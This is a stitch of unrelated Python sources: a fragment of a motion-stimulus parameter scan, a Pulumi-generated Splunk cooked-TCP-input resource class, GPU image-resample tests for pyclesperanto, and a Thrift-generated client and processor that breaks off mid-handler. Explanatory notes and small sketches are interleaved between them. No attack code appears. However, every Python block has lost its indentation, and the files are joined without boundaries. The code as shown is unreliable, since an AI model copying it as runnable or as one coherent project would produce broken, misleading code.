os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
v_init=mp.v_init*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
v_prior=np.logspace(-.3, 5., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
resample=np.linspace(0.1, 1., N_scan, endpoint=True))
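Each scan above sweeps one parameter over `N_scan` logarithmically spaced multipliers; with `N_scan = 5` and `base = 10`, `np.logspace(-2, 2, N_scan, base=base)` spans four decades around the default value. A pure-Python sketch of that same grid (kept free of numpy only so it runs standalone):

```python
# Pure-Python equivalent of np.logspace(-2, 2, N_scan, base=base)
# as used in the D_x scan: exponents evenly spaced from -2 to 2.
N_scan, base = 5, 10.0
lo, hi = -2.0, 2.0
step = (hi - lo) / (N_scan - 1)
grid = [base ** (lo + i * step) for i in range(N_scan)]
print(grid)  # approximately [0.01, 0.1, 1.0, 10.0, 100.0]
```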
# coding=utf-8
# File: sdk/python/pulumi_splunk/inputs_tcp_cooked.py (repo: pulumi/pulumi-splunk, licenses: ECL-2.0, Apache-2.0)
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['InputsTcpCookedArgs', 'InputsTcpCooked']
@pulumi.input_type
class InputsTcpCookedArgs:
def __init__(__self__, *,
acl: Optional[pulumi.Input['InputsTcpCookedAclArgs']] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a InputsTcpCooked resource.
:param pulumi.Input['InputsTcpCookedAclArgs'] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
if acl is not None:
pulumi.set(__self__, "acl", acl)
if connection_host is not None:
pulumi.set(__self__, "connection_host", connection_host)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if host is not None:
pulumi.set(__self__, "host", host)
if name is not None:
pulumi.set(__self__, "name", name)
if restrict_to_host is not None:
pulumi.set(__self__, "restrict_to_host", restrict_to_host)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input['InputsTcpCookedAclArgs']]:
"""
The app/user context that is the namespace for the resource
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input['InputsTcpCookedAclArgs']]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter(name="connectionHost")
def connection_host(self) -> Optional[pulumi.Input[str]]:
"""
Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
"""
return pulumi.get(self, "connection_host")
@connection_host.setter
def connection_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_host", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if input is disabled.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host from which the indexer gets data.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The port number of this input.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="restrictToHost")
def restrict_to_host(self) -> Optional[pulumi.Input[str]]:
"""
Restrict incoming connections on this port to the host specified here.
"""
return pulumi.get(self, "restrict_to_host")
@restrict_to_host.setter
def restrict_to_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restrict_to_host", value)
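Every field in the generated class above follows the same shape: constructor stores optional values via `pulumi.set`, and a `@property` getter/setter pair reads and writes them back. A dependency-free sketch of that pattern (a stand-in class with `pulumi.get`/`pulumi.set` replaced by a plain dict; the hostname is hypothetical):

```python
# Stand-in illustrating the getter/setter pattern the generated
# Pulumi args classes use, without importing pulumi itself.
class ArgsSketch:
    def __init__(self, host=None):
        self._values = {}
        if host is not None:
            self._values["host"] = host

    @property
    def host(self):
        # Mirrors: return pulumi.get(self, "host")
        return self._values.get("host")

    @host.setter
    def host(self, value):
        # Mirrors: pulumi.set(self, "host", value)
        self._values["host"] = value

args = ArgsSketch(host="10.0.0.1")
args.host = "splunk.example.com"  # hypothetical hostname
print(args.host)  # splunk.example.com
```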
@pulumi.input_type
class _InputsTcpCookedState:
def __init__(__self__, *,
acl: Optional[pulumi.Input['InputsTcpCookedAclArgs']] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering InputsTcpCooked resources.
:param pulumi.Input['InputsTcpCookedAclArgs'] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
if acl is not None:
pulumi.set(__self__, "acl", acl)
if connection_host is not None:
pulumi.set(__self__, "connection_host", connection_host)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if host is not None:
pulumi.set(__self__, "host", host)
if name is not None:
pulumi.set(__self__, "name", name)
if restrict_to_host is not None:
pulumi.set(__self__, "restrict_to_host", restrict_to_host)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input['InputsTcpCookedAclArgs']]:
"""
The app/user context that is the namespace for the resource
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input['InputsTcpCookedAclArgs']]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter(name="connectionHost")
def connection_host(self) -> Optional[pulumi.Input[str]]:
"""
Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
"""
return pulumi.get(self, "connection_host")
@connection_host.setter
def connection_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_host", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if input is disabled.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host from which the indexer gets data.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The port number of this input.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="restrictToHost")
def restrict_to_host(self) -> Optional[pulumi.Input[str]]:
"""
Restrict incoming connections on this port to the host specified here.
"""
return pulumi.get(self, "restrict_to_host")
@restrict_to_host.setter
def restrict_to_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restrict_to_host", value)
class InputsTcpCooked(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']]] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## # Resource: InputsTcpCooked
Create or update cooked TCP input information and create new containers for managing cooked data.
## Example Usage
```python
import pulumi
import pulumi_splunk as splunk
tcp_cooked = splunk.InputsTcpCooked("tcpCooked",
connection_host="dns",
disabled=False,
restrict_to_host="splunk")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[InputsTcpCookedArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## # Resource: InputsTcpCooked
Create or update cooked TCP input information and create new containers for managing cooked data.
## Example Usage
```python
import pulumi
import pulumi_splunk as splunk
tcp_cooked = splunk.InputsTcpCooked("tcpCooked",
connection_host="dns",
disabled=False,
restrict_to_host="splunk")
```
:param str resource_name: The name of the resource.
:param InputsTcpCookedArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InputsTcpCookedArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']]] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InputsTcpCookedArgs.__new__(InputsTcpCookedArgs)
__props__.__dict__["acl"] = acl
__props__.__dict__["connection_host"] = connection_host
__props__.__dict__["disabled"] = disabled
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["restrict_to_host"] = restrict_to_host
super(InputsTcpCooked, __self__).__init__(
'splunk:index/inputsTcpCooked:InputsTcpCooked',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']]] = None,
connection_host: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
restrict_to_host: Optional[pulumi.Input[str]] = None) -> 'InputsTcpCooked':
"""
Get an existing InputsTcpCooked resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['InputsTcpCookedAclArgs']] acl: The app/user context that is the namespace for the resource
:param pulumi.Input[str] connection_host: Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
:param pulumi.Input[bool] disabled: Indicates if input is disabled.
:param pulumi.Input[str] host: Host from which the indexer gets data.
:param pulumi.Input[str] name: The port number of this input.
:param pulumi.Input[str] restrict_to_host: Restrict incoming connections on this port to the host specified here.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InputsTcpCookedState.__new__(_InputsTcpCookedState)
__props__.__dict__["acl"] = acl
__props__.__dict__["connection_host"] = connection_host
__props__.__dict__["disabled"] = disabled
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["restrict_to_host"] = restrict_to_host
return InputsTcpCooked(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def acl(self) -> pulumi.Output['outputs.InputsTcpCookedAcl']:
"""
The app/user context that is the namespace for the resource
"""
return pulumi.get(self, "acl")
@property
@pulumi.getter(name="connectionHost")
def connection_host(self) -> pulumi.Output[str]:
"""
Valid values: (ip | dns | none)
Set the host for the remote server that is sending data.
ip sets the host to the IP address of the remote server sending data.
dns sets the host to the reverse DNS entry for the IP address of the remote server sending data.
none leaves the host as specified in inputs.conf, which is typically the Splunk system hostname.
Default value is dns.
"""
return pulumi.get(self, "connection_host")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[bool]:
"""
Indicates if input is disabled.
"""
return pulumi.get(self, "disabled")
@property
@pulumi.getter
def host(self) -> pulumi.Output[str]:
"""
Host from which the indexer gets data.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The port number of this input.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="restrictToHost")
def restrict_to_host(self) -> pulumi.Output[str]:
"""
Restrict incoming connections on this port to the host specified here.
"""
return pulumi.get(self, "restrict_to_host")
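Every generated attribute in the classes above follows the same shape: a `@property` getter with a docstring over a backing store, paired with a setter. Stripped of the `pulumi.get`/`pulumi.set` machinery, the pattern is just this (an illustrative sketch, not part of the generated SDK):

```python
class InputState:
    """Minimal stand-in for a generated state class."""

    def __init__(self, host=None):
        # Backing store; only set keys that were actually provided.
        self._values = {}
        if host is not None:
            self._values["host"] = host

    @property
    def host(self):
        """Host from which the indexer gets data."""
        return self._values.get("host")

    @host.setter
    def host(self, value):
        self._values["host"] = value


s = InputState(host="10.0.0.1")
s.host = "splunk-hec"   # setter overwrites the constructor value
empty = InputState()    # unset attributes read back as None
```

The real classes route through `pulumi.get`/`pulumi.set` so the engine can track inputs, but the property protocol is identical.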
# tests/test_resample.py (repo: haesleinhuepf/pyclesperanto_prototype, license: BSD-3-Clause)
import pyclesperanto_prototype as cle
import numpy as np
def test_resample_downsample_2d():
test1 = cle.push(np.asarray([
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
]))
reference = cle.push(np.asarray([
[0, 2],
[1, 4]
]))
result = cle.resample(test1, factor_x=0.5, factor_y=0.5)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
assert (np.array_equal(a, b))
def test_resample_upsample_2d():
test1 = cle.push(np.asarray([
[0, 2],
[1, 4]
]))
reference = cle.push(np.asarray([
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
]))
result = cle.resample(test1, factor_x=2, factor_y=2)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
assert (np.array_equal(a, b))
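For reference, the nearest-neighbour semantics the two tests above expect can be reproduced on the CPU with plain NumPy: integer upsampling is `np.repeat` along each axis, and downsampling by a factor of 0.5 is stride-2 slicing. This is an illustrative sketch of the expected result, not part of pyclesperanto:

```python
import numpy as np

a = np.asarray([[0, 2],
                [1, 4]])

# Upsample by 2 in each axis: repeat rows, then repeat columns.
up = np.repeat(np.repeat(a, 2, axis=0), 2, axis=1)

# Downsample by 0.5 in each axis: keep every second row and column.
down = up[::2, ::2]
```

Here `up` matches the 4x4 reference array used in the tests, and `down` recovers the original 2x2 array.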
def test_resample_downsample_3d():
test1 = cle.push(np.asarray([
[
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
],[
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
],[
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
],[
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
]
]))
reference = cle.push(np.asarray([
[
[0, 2],
[1, 4]
], [
[5, 5],
[5, 5]
]
]))
result = cle.resample(test1, factor_x=0.5, factor_y=0.5, factor_z=0.5)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
assert (np.array_equal(a, b))
def test_resample_upsample_3d():
test1 = cle.push(np.asarray([
[
[0, 2],
[1, 4]
], [
[5, 5],
[5, 5]
]
]))
reference = cle.push(np.asarray([
[
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
], [
[0, 0, 2, 2],
[0, 0, 2, 2],
[1, 1, 4, 4],
[1, 1, 4, 4]
], [
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
], [
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5],
[5, 5, 5, 5]
]
]))
result = cle.resample(test1, factor_x=2, factor_y=2, factor_z=2)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
import pytest
import pyopencl as cl
from . import LINUX, CI
@pytest.mark.xfail('LINUX and CI', reason='clImages not supported on CI', raises=ValueError)
def test_resample_upsample_3d_with_interpolation():
test1 = cle.push(np.asarray([
[
[0, 2]
], [
[5, 5]
]
]))
reference = cle.push(np.asarray([
[
[0, 0.5, 1.5, 1.5],
], [
[3.75, 5, 5, 3.75]
]
]))
result = cle.resample(test1, factor_x=2, factor_y=1, factor_z=1, linear_interpolation=True)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
# pa_script/gen_code/idl/stuff_info.py (repo: marklion/progress_assitant, license: MIT)
#
# Autogenerated by Thrift Compiler (0.14.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def get_today(self, ssid):
"""
Parameters:
- ssid
"""
pass
def get_today_unfollow(self, ssid):
"""
Parameters:
- ssid
"""
pass
def get_stuff_detail(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
pass
def add_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
pass
def cancle_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
pass
def get_follow_stuff_by_company(self, company_name):
"""
Parameters:
- company_name
"""
pass
def get_follow_company_by_stuff(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
pass
def get_related_stuff(self, ssid):
"""
Parameters:
- ssid
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def get_today(self, ssid):
"""
Parameters:
- ssid
"""
self.send_get_today(ssid)
return self.recv_get_today()
def send_get_today(self, ssid):
self._oprot.writeMessageBegin('get_today', TMessageType.CALL, self._seqid)
args = get_today_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_today(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_today_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_today failed: unknown result")
def get_today_unfollow(self, ssid):
"""
Parameters:
- ssid
"""
self.send_get_today_unfollow(ssid)
return self.recv_get_today_unfollow()
def send_get_today_unfollow(self, ssid):
self._oprot.writeMessageBegin('get_today_unfollow', TMessageType.CALL, self._seqid)
args = get_today_unfollow_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_today_unfollow(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_today_unfollow_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_today_unfollow failed: unknown result")
def get_stuff_detail(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
self.send_get_stuff_detail(type_id, ssid)
return self.recv_get_stuff_detail()
def send_get_stuff_detail(self, type_id, ssid):
self._oprot.writeMessageBegin('get_stuff_detail', TMessageType.CALL, self._seqid)
args = get_stuff_detail_args()
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_stuff_detail(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_stuff_detail_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_stuff_detail failed: unknown result")
def add_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
self.send_add_company_follow_stuff(company_name, type_id, ssid)
return self.recv_add_company_follow_stuff()
def send_add_company_follow_stuff(self, company_name, type_id, ssid):
self._oprot.writeMessageBegin('add_company_follow_stuff', TMessageType.CALL, self._seqid)
args = add_company_follow_stuff_args()
args.company_name = company_name
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_add_company_follow_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = add_company_follow_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "add_company_follow_stuff failed: unknown result")
def cancle_company_follow_stuff(self, company_name, type_id, ssid):
"""
Parameters:
- company_name
- type_id
- ssid
"""
self.send_cancle_company_follow_stuff(company_name, type_id, ssid)
return self.recv_cancle_company_follow_stuff()
def send_cancle_company_follow_stuff(self, company_name, type_id, ssid):
self._oprot.writeMessageBegin('cancle_company_follow_stuff', TMessageType.CALL, self._seqid)
args = cancle_company_follow_stuff_args()
args.company_name = company_name
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_cancle_company_follow_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = cancle_company_follow_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "cancle_company_follow_stuff failed: unknown result")
def get_follow_stuff_by_company(self, company_name):
"""
Parameters:
- company_name
"""
self.send_get_follow_stuff_by_company(company_name)
return self.recv_get_follow_stuff_by_company()
def send_get_follow_stuff_by_company(self, company_name):
self._oprot.writeMessageBegin('get_follow_stuff_by_company', TMessageType.CALL, self._seqid)
args = get_follow_stuff_by_company_args()
args.company_name = company_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_follow_stuff_by_company(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_follow_stuff_by_company_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_follow_stuff_by_company failed: unknown result")
def get_follow_company_by_stuff(self, type_id, ssid):
"""
Parameters:
- type_id
- ssid
"""
self.send_get_follow_company_by_stuff(type_id, ssid)
return self.recv_get_follow_company_by_stuff()
def send_get_follow_company_by_stuff(self, type_id, ssid):
self._oprot.writeMessageBegin('get_follow_company_by_stuff', TMessageType.CALL, self._seqid)
args = get_follow_company_by_stuff_args()
args.type_id = type_id
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_follow_company_by_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_follow_company_by_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_follow_company_by_stuff failed: unknown result")
def get_related_stuff(self, ssid):
"""
Parameters:
- ssid
"""
self.send_get_related_stuff(ssid)
return self.recv_get_related_stuff()
def send_get_related_stuff(self, ssid):
self._oprot.writeMessageBegin('get_related_stuff', TMessageType.CALL, self._seqid)
args = get_related_stuff_args()
args.ssid = ssid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_related_stuff(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_related_stuff_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.e is not None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_related_stuff failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["get_today"] = Processor.process_get_today
self._processMap["get_today_unfollow"] = Processor.process_get_today_unfollow
self._processMap["get_stuff_detail"] = Processor.process_get_stuff_detail
self._processMap["add_company_follow_stuff"] = Processor.process_add_company_follow_stuff
self._processMap["cancle_company_follow_stuff"] = Processor.process_cancle_company_follow_stuff
self._processMap["get_follow_stuff_by_company"] = Processor.process_get_follow_stuff_by_company
self._processMap["get_follow_company_by_stuff"] = Processor.process_get_follow_company_by_stuff
self._processMap["get_related_stuff"] = Processor.process_get_related_stuff
self._on_message_begin = None
def on_message_begin(self, func):
self._on_message_begin = func
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if self._on_message_begin:
self._on_message_begin(name, type, seqid)
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_get_today(self, seqid, iprot, oprot):
args = get_today_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_today_result()
try:
result.success = self._handler.get_today(args.ssid)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except gen_exp as e:
msg_type = TMessageType.REPLY
result.e = e
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
